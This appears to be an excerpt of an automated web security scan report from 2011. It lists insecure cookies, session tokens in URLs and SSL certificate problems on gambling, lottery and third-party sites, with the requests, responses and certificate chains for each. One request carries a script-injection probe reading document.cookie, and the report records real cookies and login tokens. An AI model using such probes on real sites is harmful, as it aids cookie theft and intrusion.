<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.22. https://www.interwetten.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerPool_Web01-Web07=1718227372.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.interwetten.com/en/Default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:41 GMT
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_Web01-Web07=1718227372.20480.0000; path=/
Vary: Accept-Encoding
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.interwetten.com/en/Default.aspx">here</a></body>

7.23. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/PlayNOW/OrderYourTickets.htm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PlayNOW/OrderYourTickets.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:32:10 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

7.24. https://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.thawte.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:53 GMT
Server: Apache
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

8. Session token in URL previous next
There are 6 instances of this issue:

http://www.facebook.com/extern/login_status.php
http://www.heavenaffiliates.com/
http://www.metacafe.com/fplayer/
http://www.youtube.com/user/CrazyScratchCom
http://www.youtube.com/user/PostcodeLottery
http://www.youtube.com/user/primescratchcards1

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=115813460972&app_id=115813460972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df74bafd74%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2a4d2223%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df299f0867c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd623e07c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df34aca9878%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=115813460972&app_id=115813460972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df74bafd74%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2a4d2223%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df299f0867c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd623e07c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df34aca9878%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=fd623e07c&origin=http%3A%2F%2Fwww.metacafe.com%2Ff4dd62dc8&relation=parent&transport=postmessage&frame=f13cc9e5f8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.138.33
X-Cnection: close
Date: Mon, 16 May 2011 12:49:43 GMT
Content-Length: 0

8.2. http://www.heavenaffiliates.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.heavenaffiliates.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://server.iad.liveperson.net/hc/6174495/?cmd=file&file=visitorWantsToChat&site=6174495&SESSIONVAR!survey_pre-chat_enable=off&SESSIONVAR!Chat_from_page=heavenaffiliates&SESSIONVAR!Skill=HeavenAffiliates

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> He
...[SNIP]...
<li>
<a href="http://server.iad.liveperson.net/hc/6174495/?cmd=file&file=visitorWantsToChat&site=6174495&SESSIONVAR!survey_pre-chat_enable=off&SESSIONVAR!Chat_from_page=heavenaffiliates&SESSIONVAR!Skill=HeavenAffiliates" target="_blank"><img src="http://www.heavenaffiliates.com/wp-content/themes/ha/images/live-chat.png" alt="Live Chat" id="live" />
...[SNIP]...

8.3. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd
https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&action=login
https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&action=register

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<li class="Account" id="Register"><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&action=register" rel="nofollow" title="Register">Register</a>
...[SNIP]...
<li class="Account" id="SignIn"><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&action=login" rel="nofollow" title="Sign In">Sign In</a>
...[SNIP]...
<li class="report" id="Submit"><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&action=login" title="" tabindex="7">Upload</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd" title="Your Channel">My Channel</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd" title="Subscriptions">Subscriptions</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd" title="Favorites">Favorites</a>
...[SNIP]...
<li><a id="CountryFlag" href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd">Location: <img src="http://s.mcstatic.com/Images/flags/us.gif" alt="US" />
...[SNIP]...

8.4. http://www.youtube.com/user/CrazyScratchCom previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/user/CrazyScratchCom

Issue detail

The response contains the following links that appear to contain session tokens:

http://m.youtube.com/profile?desktop_uri=%2Fuser%2FCrazyScratchCom&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=CrazyScratchCom&autoplay=True&gl=US

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
<link rel="canonical" href="/user/CrazyScratchCom">
<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FCrazyScratchCom&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=CrazyScratchCom&autoplay=True&gl=US">
<meta name="title" content="">
...[SNIP]...
</style>

<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FCrazyScratchCom&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=CrazyScratchCom&autoplay=True&gl=US">

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/CrazyScratchCom/uploads?alt=rss&v=2&orderby=published&client=ytapi-youtube
...[SNIP]...

8.5. http://www.youtube.com/user/PostcodeLottery previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/user/PostcodeLottery

Issue detail

The response contains the following links that appear to contain session tokens:

http://m.youtube.com/profile?desktop_uri=%2Fuser%2FPostcodeLottery&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=PostcodeLottery&autoplay=True&gl=US

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
<link rel="canonical" href="/user/PostcodeLottery">
<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FPostcodeLottery&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=PostcodeLottery&autoplay=True&gl=US">
<meta name="title" content="The People's Postcode Lottery">
...[SNIP]...
</style>

<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FPostcodeLottery&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=PostcodeLottery&autoplay=True&gl=US">

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/PostcodeLottery/uploads?alt=rss&v=2&orderby=published&client=ytapi-youtube
...[SNIP]...

8.6. http://www.youtube.com/user/primescratchcards1 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/user/primescratchcards1

Issue detail

The response contains the following links that appear to contain session tokens:

http://m.youtube.com/profile?desktop_uri=%2Fuser%2Fprimescratchcards1&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=primescratchcards1&autoplay=True&gl=US

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Set-Cookie: GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
<link rel="canonical" href="/user/primescratchcards1">
<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2Fprimescratchcards1&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=primescratchcards1&autoplay=True&gl=US">
<meta name="title" content="">
...[SNIP]...
</style>

<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2Fprimescratchcards1&sort=p&channel_id=0&livestreaming_tutorial=False&ytsession=%7B%7D&start=0&user=primescratchcards1&autoplay=True&gl=US">

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/primescratchcards1/uploads?alt=rss&v=2&orderby=published&client=ytapi-yout
...[SNIP]...

9. SSL certificate previous next
There are 25 instances of this issue:

https://clicktale.pantherssl.com/
https://www.aspireaffiliates.com/
https://www.thawte.com/
https://help.betsson.com/
https://bingo.betsson.com/
https://ble.hs.llnwd.net/
https://casino.betsson.com/
https://download.macromedia.com/
https://download.neogames-tech.com/
https://games.betsson.com/
https://in.getclicky.com/
https://livecasino.betsson.com/
https://members.bet365.com/
https://poker.betsson.com/
https://scratch.betsson.com/
https://seal.verisign.com/
https://sealinfo.verisign.com/
https://secure.neogames-tech.com/
https://static.getclicky.com/
https://www.betsson.com/
https://www.interwetten.com/
https://www.macromedia.com/
https://www.neogamespartners.com/
https://www.norskelodd.com/
https://www.postcodelottery.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

9.1. https://clicktale.pantherssl.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://clicktale.pantherssl.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.pantherssl.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Wed Oct 27 19:00:00 CDT 2010
Valid to:	Tue Dec 11 17:59:59 CST 2012

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 19:00:00 CDT 2007
Valid to:	Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sun Oct 01 00:00:00 CDT 2006
Valid to:	Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

9.2. https://www.aspireaffiliates.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	aspireaffiliates.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Wed Jan 12 05:35:30 CST 2011
Valid to:	Thu Jan 12 05:35:30 CST 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

9.3. https://www.thawte.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.thawte.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	www.thawte.com
Issued by:	thawte Extended Validation SSL CA
Valid from:	Tue Nov 10 18:00:00 CST 2009
Valid to:	Fri Nov 11 17:59:59 CST 2011

Certificate chain #1

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Extended Validation SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Nov 16 17:59:59 CST 2016

Certificate chain #3

Issued to:	thawte Primary Root CA
Issued by:	thawte Primary Root CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

9.4. https://help.betsson.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://help.betsson.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate has expired.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	UTN - DATACorp SGC
Valid from:	Mon Apr 27 19:00:00 CDT 2009
Valid to:	Thu Apr 28 18:59:59 CDT 2011

Certificate chain #1

Issued to:	UTN - DATACorp SGC
Issued by:	UTN - DATACorp SGC
Valid from:	Thu Jun 24 13:57:21 CDT 1999
Valid to:	Mon Jun 24 14:06:30 CDT 2019

9.5. https://bingo.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bingo.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	COMODO High-Assurance Secure Server CA
Valid from:	Sun Apr 17 19:00:00 CDT 2011
Valid to:	Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:	COMODO High-Assurance Secure Server CA
Issued by:	AddTrust External CA Root
Valid from:	Thu Apr 15 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

9.6. https://ble.hs.llnwd.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ble.hs.llnwd.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.hs.llnwd.net
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 15 09:39:34 CDT 2009
Valid to:	Sun Sep 16 01:17:48 CDT 2012

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

9.7. https://casino.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://casino.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	COMODO High-Assurance Secure Server CA
Valid from:	Sun Apr 17 19:00:00 CDT 2011
Valid to:	Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:	COMODO High-Assurance Secure Server CA
Issued by:	AddTrust External CA Root
Valid from:	Thu Apr 15 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

9.8. https://download.macromedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://download.macromedia.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	download.macromedia.com,ST=California
Issued by:	Akamai Subordinate CA 3
Valid from:	Tue Apr 19 10:37:25 CDT 2011
